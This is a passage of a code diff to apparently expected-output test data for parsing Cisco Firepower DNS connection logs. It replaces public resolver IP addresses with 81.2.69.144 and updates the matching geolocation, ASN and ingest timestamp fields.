"country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -372,7 +381,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -381,8 +390,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350943Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "ingested": "2021-12-09T13:35:02.912964300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -412,7 +421,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -453,24 +462,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -518,7 +530,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -527,8 +539,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350945900Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", + "ingested": "2021-12-09T13:35:02.912970200Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -559,7 +571,7 @@ "dns_query": "www.elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -601,24 +613,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -666,7 +681,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -675,8 +690,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350948600Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", + "ingested": "2021-12-09T13:35:02.912976100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -706,7 +721,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -748,24 +763,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -813,7 +831,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -822,8 +840,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350951100Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", + "ingested": "2021-12-09T13:35:02.912981900Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -853,7 +871,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -894,24 +912,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -959,7 +980,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -968,8 +989,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350953700Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "ingested": "2021-12-09T13:35:02.912987700Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1000,7 +1021,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1043,24 +1064,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1108,7 +1132,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1117,8 +1141,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350956500Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "ingested": "2021-12-09T13:35:02.912994100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1148,7 +1172,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1189,24 +1213,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1254,7 +1281,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1263,8 +1290,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350959100Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "ingested": "2021-12-09T13:35:02.912999300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1294,7 +1321,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1336,24 +1363,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1401,7 +1431,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1410,8 +1440,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350961600Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "ingested": "2021-12-09T13:35:02.913005400Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1442,7 +1472,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1484,27 +1514,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -122.3303, - "lat": 47.6109 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "205.251.196.144", + "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "205.251.196.144", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1552,7 +1582,7 @@ ], "ip": [ "10.0.1.20", - "205.251.196.144" + "81.2.69.144" ] }, "host": { @@ -1561,8 +1591,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350964100Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", + "ingested": "2021-12-09T13:35:02.913011300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1592,7 +1622,7 @@ "dns_query": "refusedthis.com", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "205.251.196.144", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1626,24 +1656,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 4 }, "dns": { @@ -1694,7 +1727,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1703,8 +1736,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350966900Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", + "ingested": "2021-12-09T13:35:02.913017500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1736,7 +1769,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "39541", "src_ip": "10.0.1.20", @@ -1774,23 +1807,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1838,7 +1874,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -1847,8 +1883,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:21:56.350969400Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", + "ingested": "2021-12-09T13:35:02.913025600Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", 